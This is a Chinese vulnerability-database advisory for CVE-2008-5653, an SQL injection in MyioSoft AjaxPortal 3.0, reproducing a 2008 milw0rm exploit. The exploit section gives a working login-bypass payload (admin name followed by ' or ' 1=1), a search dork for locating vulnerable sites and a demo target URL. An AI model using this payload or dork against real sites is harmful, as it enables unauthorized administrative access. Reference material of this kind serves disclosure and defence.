MyioSoft AjaxPortal 'ajaxp.php'SQL注入攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116675 漏洞类型 SQL注入
发布时间 2008-11-07 更新时间 2008-12-24
CVE编号 CVE-2008-5653 CNNVD-ID CNNVD-200812-345
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-345
|漏洞详情
MyioSoftAjaxPortal是一款制作个人门户网站入口的软件。MyioSoftAjaxPortal3.0版本的ajaxp.php中的loginADP函数中存在SQL注入漏洞。远程攻击者可以借助可以通过用户名参数获得的rsargs参数,执行任意SQL指令。
|漏洞EXP
[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: "Powered by Ajax Portal 3.0"
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/AjaxPortal/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-07]
|参考资料

来源:BID
名称:32199
链接:http://www.securityfocus.com/bid/32199
来源:SECUNIA
名称:32673
链接:http://secunia.com/advisories/32673
来源:OSVDB
名称:49700
链接:http://osvdb.org/49700
来源:MILW0RM
名称:7044
链接:http://milw0rm.com/exploits/7044